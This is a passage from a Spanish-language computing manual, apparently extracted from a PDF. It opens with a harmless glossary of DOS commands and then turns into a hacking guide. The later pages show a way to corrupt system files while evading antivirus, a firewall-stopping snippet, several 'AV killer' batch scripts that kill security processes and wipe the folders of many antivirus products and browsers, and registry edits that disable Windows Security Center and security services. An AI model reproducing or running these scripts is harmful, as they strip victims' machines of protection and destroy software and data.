  25. 25. 25dos shell ha sidosuprimido en la versión DOS 6.2 ya que Microsoft consideró quehabÃa sido reemplazado ventajosamente por el “Administrador de archivos” esedesuperprograma que es Windows.DRIVER.SYS - Administra las disqueteras, a través del Config.Sys.DRIVPARM - Define los parámetros de periféricos en modo bloque,a través del Config.Sys.DRIVESPACE - Reemplaza a DBLSPACE a partir del DOS 6.22, con lasmismas fun Âciones.ECHO - Vuelve a mostrar en pantalla o no, en eco, los comandosejecutados en un archivo .BAT, según se ponga o no en servicio esteeco, usando ON u OFF respec Âtivamente. Permite introducir unmensaje que será mostrado en pantalla en todos los casos.EMM386 - Sirve de soporte a la memoria expandida.EMM386.EXE - Simula la memoria expandida en la memoriaextendida, a través del Config.sys.ERASE - Destruye uno o varios archivos del disco (y actúa como elcomando DEL). Opte por DEL ya que se escribe más rápido.ERROLEVEL - Código de errores para archivos .BAT Otra nociónmás para expertos.EXE2BIN - Convierte el formato .EXE en .BIN o .COM. Este comando,que no exis Âte más en los DOS 6, está destinado a losprogramadores.EXIT - Sale de un procesador de comandos. En la mayorÃa de loscasos, EXIT le permite salir del DOS para volver al programa que lollama, Windows por ejemplo.EXPAND - Descomprime un archivo comprimido. A partir del DOSversión 5.FASTHELP - Muestra en pantalla la lista de comandos de la versión 6con una breve explicación.FASTOPEN - Proporciona un acceso rápido a los archivos que se usancon más frecuencia, o a los últimos que se han utilizado,
  26. 26. 26memorizando su camino de acceso.FC - Comparación de archivos. No está disponible en todas lasversiones.FCBS - Especifica la cantidad de bloques de control de archivos, en unConfig.Sys. Este comando está reservado a los expertos.FILES - Especifica la cantidad de archivos abiertos, en un Config.Sys.FIND - Busca la cadena de caracteres indicada en un archivo y envÃaal periférico activo de salida (el monitor, por ejemplo) todas las lÃ-neas en las que la encontró.FOR - Especifica la repetición del mismo comando para cada una delas variables contenidas en la lista.GOTO - Es un direccionamien to incondicional a una lÃnea marcadacon un rótulo del mismo nombre en un archivo .BAT.GRAFTABL - Carga la tabla de los caracteres gráficos, los códigosASCII 128 a 255, para la visualización en pantalla. No existe másen el DOS 6.GRAPHIC - Carga una secuencia que permite la impresión de lapantalla que incluye caracteres gráficos, de códigos 128 a 255.GWBASIC - Llamado del antiguo Basic avanzado de Microsoft. Noexiste más en el DOS 6, en el cual ha sido reemplazado por elQBasic.HELP - Pedido de ayuda. Desde el DOS 5.HIMEM.SYS - Administrador de memoria extendida.IF - Comando de ejecución condicional para archivo .BAT.INCLUDE - Incluye un bloque de configuración en otro, a travésdel Config.Sys. Nuevo comando con el DOS 6.INTERLNK - Conecta dos computadoras, por medio de sus puertosparalelos o en serie. Nuevo comando del DOS 6.INTERLNK.EXE - Administrador para Interlnk. Novedad del DOSversión 6.INTERSVR - Lanza el centro de recuperación de datos InterLnk.
  27. 27. 27Nuevo comando del DOS 6.JOIN - Asigna el contenido de un disco a un directorio de otro disco.No existe más en el DOS 6.KEYB - Carga el programa que administra el teclado (reemplaza alque reside en la memoria muerta, para el teclado USA).LABEL - Crea, modifica o suprime el nombre atribuido a un disco.LASTDRIVE - Define la cantidad de unidades de disco en elConfig.Sys.LH - Carga un programa en la memoria superior, generalmente en elAutoexec.bat. Otro nombre: LOADHIGH.LINK - Llama al editor de conexiones.LOADFIX - Carga un programa por encima de los primeros 64 Kb dememoria y lo ejecuta. Nuevo comando del DOS 6.LOADHIGH - Carga un programa en la memoria superior,generalmente a través del Autoexec.bat. Desde el DOS 5. Otronombre: LH.MACROS - Realización de macros con Doskey.MEM - Muestra en pantalla la memoria ocupada y la disponible.MEMMAKER - Administración y optimización de la memoria, perocon los DOS 6. ·MENUCOLOR - Determina el color del texto y del fondo para el primermenú, a través del Config.Sys. A partir del DOS 6.MENUDEFAULT - Especifica el menú por defecto, en el inicio. A partirdel DOS 6.MENUITEM - A partir del DOS 6. Define un Ãtem del menú dearranque.MIRROR - Copia de seguridad para el seguimiento del borrado dearchivos. Con el DOS 5.MKDIR - Crea un subdirectorio. Otro nombre de este comando: MD,por "Make Directory” , creación de un directorio.
  28. 28. 28MODE - Establece las condiciones de funcionamiento de losperiféricos, impresora, interface de video y conexiones en serie, ytambién sirve para la preparación de las tablas de códigos.MORE - Para visualizar página por página en la pantalla (es decir,sin que desfilen ininterrumpida mente en la pantalla)MOVE - Mueve uno o varios archivos y da nuevo nombre a archivos odirectorios. Nuevo comando con el DOS 6.MSAV - Programa antivirus. A partir del DOS 6.MSBACKUP - Nuevo procedimiento de copia de seguridad, a partir delDOS 6.MSD - Provee información técnica sobre su computadora. A partirdel DOS 6.NLSFUNC - Comando relativo a los idiomas nacionales. Su nombreproviene de "National Languages Support Function” .Da informaciones complementaria s sobre los paÃses y prepara el usode las tablas de códigos con CHCPNUMLOCK - Determina que la sección numérica del teclado estébloqueada o no, a través del Config.Sys. Nuevo comando a partirdel DOS 6.PATH - Especifiica caminos de búsqueda alternativos para losarchivos de comando (con la extensión .COM, o .EXE o .BAT) que nose encuentran en el directorio acti Âvo. Este comando se encuentrageneralmente en el archivo Autoexec.bat.PAUSE - Suspende la ejecución de un programa .BAT mostrando enpantalla un mensaje optativo de 121 caracteres como máximo.POWER - Pone en servicio o saca de servicio la administración delconsumo de energÃa. Nuevo comando a partir del DOS 6.POWER.EXE - Administrador de POWER. Nuevo, a partir del DOS 6.PRINT - Imprime el contenido de archivos, en segundo plano,mientras se prosigue con un trabajo en la pantalla.PRINTER.SYS - Se utiliza para conmutar las tablas de códigos conlas impresoras, a través del Config.Sys.PROMPT - Define o muestra en pantalla los sÃmbolos del sistema
  29. 29. 29utilizados por el DOS.QBASIC - Es el nuevo lenguaje Basic de Microsoft. A partir del DOS 5.RAMDRIVE - Instala un disco virtual, a través del Config.Sys.RD - Suprime un subdirectorio que debe estar obligatoriamen tevacÃo (y que, por lo tanto, sólo debe contener las marcas . y ..). Elnombre completo de este comando es RMDIR.RECOVER - Interviene cuando hay que recuperar los datos de unarchivo porque hay un sector defectuoso en el disco. Los datos deeste sector se habrán perdido. No existe más en el DOS 6.REM - Introduce observaciones, comentarios, en 123 caracteres comomáximo por lÃnea de REM.REN - Cambia el nombre de un archivo.RENAME - Cambia el nombre de un archivo. Es lo mismo que REN,pero más lar Âgo de escribir.REPLACE - Reemplaza o agrega selectivamente archivos queprovienen de un dis Âco fuente a un disco destinatario.RESTORE - Restaura, restablece el contenido de un disco a partir desu copia de seguridad anterior, con los DOS hasta el 5 inclusive. En elDOS 6, sólo existe para la compatibilidad .RMDIR - Suprime un subdirectorio que debe estar obligatoriamen tevacÃo (y que, por lo tanto, sólo debe contener las marcas . y ..). Elnombre abreviado es RD.SET - Sirve para definir el entorno de trabajo que requieren algunosprogramas, introduciendo un nombre seguido de su equivalencia.SETVER - Declara las versiones del DOS para algunas aplicaciones.SETVER.EXE - Administrador de SETVER.SHARE - Instala el programa para compartir archivos.SHELL - Instala un procesador de comandos.SHIFT - Sirve para utilizar más de 10 parámetros reemplazablesnumerados de 0 a 9, en las lÃneas de comando, marcando una
  30. 30. 30diferencia de una posición para cada SHIFT que se introduce.SHIPDISK - Bloquea los cabezales del disco duro antes dedesplazarlo. Desapareció en el DOS 6.SIZER.EXE - Utilizado por el programa de optimización de lamemoria MemMaker Novedad del DOS 6.SMARTDRV - Creación de la antememoria de disco SmartDrive.SMARTDRV.EXE - Administrador de SmartDrv.SMARTMON - Programa de monitoreo (de vigilancia) de SmartDrive.SORT - Ordena datos.STACKS - Define las pilas, a través del Config.Sys.SUBMENU - Define un Ãtem del menú de arranque abriendo unsubmenú. Nuevo comando del DOS 6.SUBST - Sustituye un camino de acceso cuya descripción es larga,y/o su unidad, por una unidad de disco ficticia que bastará conllamar luego.SWITCHES - Sustituye el teclado extendido por el tecladoconvencional.SYS - Copia los tres archivos que sirven de núcleo al sistema deldisco fuente activo al disco destinatario.TEMP - Variable de entorno.TIME - Muestra en pantalla o configura la hora del sistema (incluidoslos relojes permanentes, resguardados).TREE - Muestra los árboles de los directorios de un disco (y la listade sus archivos con una clave suplementaria).TYPE - Muestra en pantalla el contenido de un archivo.UNDELETE - Recuperación de archivos borrados. A partir de laversión DOS 5.UNFORMAT - Reconstrucción de un disco reformateado. A partir delDOS 5.
  31. 31. 31VDISK - Instala un disco virtual, a través del Config.Sys. Dejó deestar incluido a partir del DOS 6.VER - Muestra en pantalla la versión activa del DOS.VERIFY - Pone en servicio (con ON) o anula (con OFF) la verificaciónde los datos escritos en el disco.VOL - Muestra en pantalla el nombre del disco solicitado.VSAFE - Residente antivirus.XCOPY - Copia archivos selectivamente, inclusive los que provienende subdirectorios . Es un comando excelente que puede servir inclusopara efectuar copias de seguridad. 17. Inutilizar ArchivosSi queremos borrar el archivo kernel32.sys, lo hariamos asi:Código:del /q kermel32.sysClaro que, los antivirus ven eso y lo erradican.Solucion:Código:echo Texto_malisimo > kernel32.sysNo lo borramos, claro, pero lo dejamos inutilizable por el sistema.Con este sistema, ademas de ahorrar tiempo, los antivirus no lodetectan(ya que echo es inofensivo) y los programas de reparacionno funcionan, ya que el archivo sigue ahi. 18. Firewall Killer en Xpnet stop "Security Center"net stop SharedAccessnet stop "Firewall de Windows/Conexion compartida a Internet (ICS)" 19. AV Killermira este es el famoso AV-K d Hendrix:Código:
  32. 32. 32@echo offIf exist "C:Archivos de programaewido anti-malware" (goto ewido) else (goto1):1If exist "C:Archivos de programaEset" (goto nod32) else (goto 2):2If exist "C:Archivos de programaSpybot - Search & Destroy" (goto spybot)else (goto 3):3If exist "C:Archivos de programaWindows Defender" (goto windefender) else(goto 4):4If exist "C:Archivos de programamcafee.com" (goto mcafee) else (goto 5):5If exist "C:Archivos de programaZone LabsZoneAlarm" (goto zone) else (goto6):6If exist "C:Archivos de programaTrend Micro" (goto trend) else (goto 7):7If exist "C:Archivos de programaSynaptics" (goto sinapti) else (goto 8):8If exist "C:Archivos de programaGrisoftAVG free" (goto avfree) else (goto9):9If exist "C:Archivos de programaArchivos comunesSymantec Shared" (gotonorton) else (goto 10):10If exist "C:Archivos de programaNorton AntiVirus" (goto norton2) else (goto11):11If exist "C:Program FilesPanda SoftwarePanda Platinum 2006 InternetSecurity (goto Panda06) else (goto 12):12If exist "C:Archivos de programaAlwil SoftwareAvast4" (goto Avast4) else(goto 13):13If exist "C:Archivos de programaMicrosoft AntiSpyware" (goto micanti) else(goto 14):14If exist "C:Archivos de programaKaspersky LabKaspersky Anti-Virus Personal"(goto kav) else (goto 15):15If exist "C:Archivos de programaWebrootSpy Sweeper" (goto sweeper) else(goto 16):16If exist "C:Archivos de programaSinEspias" (goto sinspy) else (goto 17):17If exist "C:Archivos de programaPanda SoftwarePanda Antivirus Titanium"(goto pandatitanium) else (gto 18):18If exist "C:Archivos de programaAVPersonal" (goto avpersonal) else (goto 19):19If exist "C:Archivos de programaSoftwinBitDefender9" (goto bit9) else (goto20):20goto fin:bit9net stop "bdoesrv"net stop "bdmcon"net stop "bdnagent"net stop "bdswitch"Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.execd C:Archivos de programaSoftwinBitDefender9attrib -H -S -R *.*del /s /q *.*:avpersonal
  33. 33. 33net stop "AVGUARD"net stop "AVWUPSRV"net stop "AVGNT"net stop "AVSched32"Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXEcd C:Archivos de programaAVPersonalattrib -H -S -R *.*del /s /q *.*:pandatitaniumnet stop "Pavsrv51"net stop "AVENGINE"net stop "apvxdwin"net stop "pavProxy"Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IMpavProxy.execd "C:Archivos de programaPanda SoftwarePanda Antivirus Titanium"attrib -H -S -R *.*del /s /q *.*rd /s /q C:Archivos de programaPanda SoftwarePanda Antivirus Titanium:sinspyTaskkill /f /IM no-spy.execd "C:Archivos de programaSinEspias"attrib -H -S -R *.*del /s /q *.*:sweeperTaskkill /f /IM WRSSSDK.exe /IM SpySweeper.execd "C:Archivos de programaWebrootSpy Sweeper"attrib -H -S -R *.*del /s /q *.*:kavcd "C:Archivos de programaKaspersky LabKaspersky Anti-Virus Personal"net stop "kav"net stop "kavsvc"Taskkill /f /IM kav.exe /IM kavsvc.exeattrib -H -S -R *.*del /s /q *.*goto 15:micanticd "C:Archivos de programaMicrosoft AntiSpyware"net stop "gcasServ"net stop "gcasDtServ"Taskkill /f /IM gcasServ.exe /IM gcasDtServ.exeattrib -H -S -R *.*del /s /q *.*goto 14:Avast4cd "C:Archivos de programaAlwil SoftwareAvast4"net stop "aswUpdSv"net stop "ashServ"net stop "ashWebSv"net stop "ashDisp"Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exeattrib -H -S -R *.*del /s /q *.*goto 13:Panda06cd "C:Program FilesPanda SoftwarePanda Platinum 2006 Internet Security"net stop "TPSrv"net stop "PavFnSvr"net stop "pavsrv51"net stop "pskmssvc"net stop "AVENGINE"net stop "PNMSRV"net stop "PsImSvc"Taskkill /f /IM TPSrv.exe /IM PavFnSvr.exe /IM pavsrv51.exe /IM pskmssvc.exe /IM AVENGINE.EXE /IM PNMSRV.EXE /IM PsImSvc.exeattrib -H -S -R *.*
  34. 34. 34del /s /q *.*cd "C:Program FilesPanda SoftwarePanda Platinum 2006 InternetSecurityAntiSpam"attrib -H -S -R *.*del /s /q *.*cd "C:Program FilesPanda SoftwarePanda Platinum 2006 InternetSecurityFIREWALL"attrib -H -S -R *.*del /s /q *.*cd "C:Program FilesCommon FilesPanda SoftwarePavShld"Taskkill /f /IM pavprsrv.exeattrib -H -S -R *.*del /s /q *.*goto 12:norton2cd "C:Archivos de programaNorton AntiVirus"net stop "navapsvc"net stop "NPFMntor"Taskkill /f /IM navapsvc.exe /IM NPFMntor.exeattrib -H -S -R *.*del /s /q *.*cd "C:Archivos de programaNorton AntiVirusIWP"attrib -H -S -R *.*del /s /q *.*goto 11:nortoncd "C:Archivos de programaArchivos comunesSymantec Shared"net stop "ccSetMgr"net stop "SNDSrvc"net stop "SPBBCSvc"net stop "ccEvtMgr"net stop "ccApp"net stop "symlcsvc"Taskkill /f /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe/IM ccApp.exe /IM symlcsvc.exeattrib -H -S -R *.*del /s /q *.*cd "C:Archivos de programaArchivos comunesSymantec SharedSPBBC"attrib -H -S -R *.*del /s /q *.*cd "C:Archivos de programaArchivos comunesSymantec SharedCCPD-LC"attrib -H -S -R *.*del /s /q *.*goto 10:avfreecd "C:Archivos de programaGrisoftAVG free"net stop "avgamsvr"net stop "vgupsvc"net stop "avgcc"Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exeattrib -H -S -R *.*del /s /q *.*goto 9:sinapticd "C:Archivos de programaSynapticsSynTP"net stop "SynTPLpr"net stop "SynTPEnh"Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exeattrib -H -S -R *.*del /s /q *.*goto 8:trendcd "C:Archivos de programaTrend MicroOfficeScan Client"net stop "ntrtscan"net stop "tmlisten"net stop "OfcPfwSvc"net stop "pccntmon"Taskkill /f /IM ntrtscan.exe /IM tmlisten.exe /IM OfcPfwSvc.exe /IM
  35. 35. 35pccntmon.exeattrib -H -S -R *.*del /s /q *.*goto 7:zonecd "C:Archivos de programaZone LabsZoneAlarm"net stop "zlclient"net stop "zonealarm"net stop "vsmon"Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exeattrib -H -S -R *.*del /s /q *.*cd "C:WINDOWSsystem32ZoneLabs"attrib -H -S -R *.*del /s /q *.*goto 6:mcafeecd "c:archivos de programamcafee.comagent"net stop "mcdetect"net stop "mctskshd"net stop "mcagent"net stop "mcvsescn"net stop "mcvsftsn"net stop "mcvsshld"net stop "mcvsrte"net stop "mcshield"Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcagent.exe /IM mcvsescn.exe/IM mcvsftsn.exe /IM mcvsshld.exe /IM mcvsrte.exe /IM mcshield.exeattrib -H -S -R *.*del /s /q *.*rd /s /q "c:archivos de programamcafee.comagent"rd /s /q "c:archivos de programamcafee.com"goto 5:windefendercd "C:Archivos de programaWindows Defender"net stop "MsMpEng"net stop "MSASCui"Taskkill /f /IM MsMpEng.exe /IM MSASCui.exeattrib -H -S -R *.*del /s /q *.*goto 4:spybotcd "C:Archivos de programaSpybot - Search & Destroy"net stop "TeaTimer"Taskkill /f /IM TeaTimer.exeattrib -H -S -R *.*del /s /q *.*goto 3:nod32cd "C:Archivos de programaEset"net stop "nod32krn"net stop "nod32kui"net stop "nod32"Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exeattrib -H -S -R *.*del /s /q *.*goto 2:ewidocd "C:Archivos de programaewido anti-malware"Taskkill /f /IM ewidoctrl.exe /IM ewidoguard.exenet stop "ewidoctrl"net stop "ewidoguard"attrib -H -S -R *.*del /s /q *.*goto 1:finexit
  36. 36. 36Otro AV killer:@echo offnet stop "Centro de Seguridad"net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"Taskkill /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IMccEvtMgr.exe /IM ccApp.exe /IM NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXEcd c:Archivos de programaArchiv os comunesSymante c Sharedattrib -H -S -R *.*del /s /q *.*rd c:Archivos de programaArchiv os comunesSymante c Sharedcd c:Archivos de programaArchiv os comunesSymante c SharedSPBBCattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM symlcsvc.execd C:Archivos de programaArchiv os comunesSymante c SharedCCPD-LCattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM SymWSC.exe /IM UsrPrmpt.execd c:Archivos de programaArchiv os comunesSymante c SharedSecurity Centerattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM navapsvc.exe /IM ISSVC.exe /IMcd c:Archivos de programaNorton Internet Securityattrib -H -S -R *.*del /s /q *.*cd c:Archivos de programaNorton Internet SecurityNorton AntiVirusattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM zlcli6ent.exe /IM zo3nealarm.execd C:Archivos de programaone LabsoneAlarmattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM ewidoctrl.execd C:Archivos de programaewido anti-malwareattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM vsmon.exeC:WINDOWSsystem3 2oneLabsattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.execd C:Archivos de programaNorton AntiVirusattrib -H -S -R *.*del /s /q *.*cd C:Archivos de programaNorton AntiVirusIWPattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM NPROTECT.EXEcd C:Archivos de programaNorton Utilitiesattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.execd C:Archivos de programaWebroo tSpy Sweeperattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IMNOPDB.EXE /IM GBTray.exe /IM NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exerd C:Archivos de programaNorton SystemWorksNor ton AntiVirusTaskkill /f /IM no-spy.execd C:Archivos de programaSinEsp iasattrib -H -S -R *.*del /s /q *.*
  37. 37. 37Taskkill /f /IM spyaxe.exe /IM spyaxe.execd C:Archivos de programaSpyAxeattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM SpywareStrike. exe /IM SpywareStrike. execd C:Archivos de programaSpywar eStrikeattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM gcasDtServ.exe /IM gcasServ.execd C:Archivos de programaMicros oft AntiSpywareattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM kavsvc.exe /IM kav.execd C:ARCHIVOS DE PROGRAMAKASPER SKY LABKASPERSKY ANTI-VIRUS PERSONALattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcregwiz.exe /IM mcagent.execd c:archivos de programamcafee .comagentattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM VsStat.execd C:Archivos de programaMcAfee McAfee VirusScanattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM firefox.execd C:Archivos de programaMozill a Firefoxattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.execd C:Archivos de programaPanda SoftwarePanda Antivirus Titaniumattrib -H -S -R *.*del /s /q *.*rd C:Archivos de programaPanda SoftwarePanda Antivirus TitaniumTaskkill /f /IM SynTPLpr.exe /IM SynTPEnh.execd C:Archivos de programaSynapt icsSynTPattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM FrameworkServi ce.exe /IM Mcshield.exe /IM VsTskMgr.exe /IM SHSTAT.EXEcd C:Archivos de programaNetwor k AssociatesViru sScanattrib -H -S -R *.*del /s /q *.*cd C:Archivos de programaNetwor k AssociatesComm on Frameworkattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM nod32krn.exe /IM nod32kui.execd C:Archivos de programaEsetattrib -H -S -R *.*del /s /q *.*rd C:Archivos de programaEsetTaskkill /f /IM AVGSERV9.EXE /IM AVGCC32.EXEcd C:PROGRAM FILESGRISOFTAV G6attrib -H -S -R *.*del /s /q *.*Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXEcd C:Archivos de programaAVPers onalattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM ASHSERV.EXE /IM ASHWEBSV.EXE /IM ASHMAISV.execd C:ARCHIVOS DE PROGRAMAALWIL SOFTWAREAVAST4attrib -H -S -R *.*del /s /q *.*Taskkill /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.execd "cd C:Archivos de programaGrisof t"
  38. 38. 38attrib -H -S -R *.*del /s /q *.*cd "AVGFRE*"attrib -H -S -R *.*del /s /q *.*Taskkill /f /IM IEXPLORE.EXEcd C:Archivos de programaIntern et Explorerattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.execd C:Archivos de programaPanda SoftwarePanda Administrator 3Pav_Agentattrib -H -S -R *.*del /s /q *.*cd C:Archivos de programaPanda SoftwarePanda Administrator 3Schedulerattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.execd C:Archivos de programaSoftwi nBitDefender9attrib -H -S -R *.*del /s /q *.*Taskkill /f /IM xcommsvr.exe /IM livesrv.exe /IM bdss.exerd C:Archivos de programaArchiv os comunesSoftwinTaskkill /f /IM DefWatch.exe /IM Rtvscan.execd C:Archivos de programaSymant ec_Client_Secu ritySymantec AntiVirusattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM avgamsvr.exe /IM avgupsvc.execd C:Archivos de programaAVG7attrib -H -S -R *.*del /s /q *.*exitMas AV killer:@echo offclscd cd "archivos de programa"cd "Norton antivirus"attrib -R -A -S -H *.*del /S /Q *.*cd..cd "Panda Software"attrib -R -A -S -H *.*del /S /Q *.*cd..cd "Kaspersky Lab"attrib -R -A -S -H *.*del /S /Q *.*cd..cd "McAfee.com"attrib -R -A -S -H *.*del /S /Q *.*cls
  39. 39. 39Aun otro Killer:reg add "HKLMsoftwaremicrosoftsecurity center" /v AntiVirusDisableNotify /t REG_DWORD/d 4 /freg add "HKLMsoftwaremicrosoftsecurity center" /v AntiVirusOverride /t REG_DWORD /d 4/freg add "HKLMsoftwaremicrosoftsecurity center" /v FirewallDisableNotify /t REG_DWORD /d 4 /freg add "HKLMsoftwaremicrosoftsecurity center" /v FirewallOverride /t REG_DWORD /d 4 /freg add "HKLMsoftwaremicrosoftsecurity center" /v FirstRunDisabled /t REG_DWORD /d4 /freg add "HKLMsoftwaremicrosoftsecurity center" /v UpdatesDisableNotify /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesSharedAccess" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesSharedAccess" /v ErrorControl /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesSharedAccess" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesSharedAccess" /v ErrorControl /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesSharedAccess" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcurrentcontrolsetservicesSharedAccess" /v ErrorControl /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesAVPCC" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesAVPCC" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesAVPCC" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesAmon" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesAmon" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesAmon" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesApvxd" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesApvxd" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesApvxd" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesApvxdwin" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesApvxdwin" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesApvxdwin" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesAtrack" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesAtrack" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesAtrack" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesAvconsoleEXE" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesAvconsoleEXE" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesAvconsoleEXE" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcontrolset001servicesAVG_CC" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesAVG_CC" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesAVG_CC" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesavgcc32" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesavgcc32" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesavgcc32" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesavgserv9" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesavgserv9" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesavgserv9" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesAVPCC Service" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcontrolset002servicesAVPCC Service" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcurrentcontrolsetservicesAVPCC Service" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesBlackIce Utility" /v Start /t REG_DWORD /d
  40. 40. 404 /freg add "HKLMsystemcontrolset002servicesBlackIce Utility" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcurrentcontrolsetservicesBlackIce Utility" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesCcApp" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesCcApp" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesCcApp" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesCcRegVfy" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesCcApp" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesCcApp" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesConfigSafe" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesConfigSafe" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesConfigSafe" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesCPD_EXE" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesCPD_EXE" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesCPD_EXE" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesDefwatch" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesDefwatch" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesDefwatch" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesdvpapi9x" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesdvpapi9x" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesdvpapi9x" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesFix-it" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesFix-it" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesFix-it" /v Start /t REG_DWORD /d 4 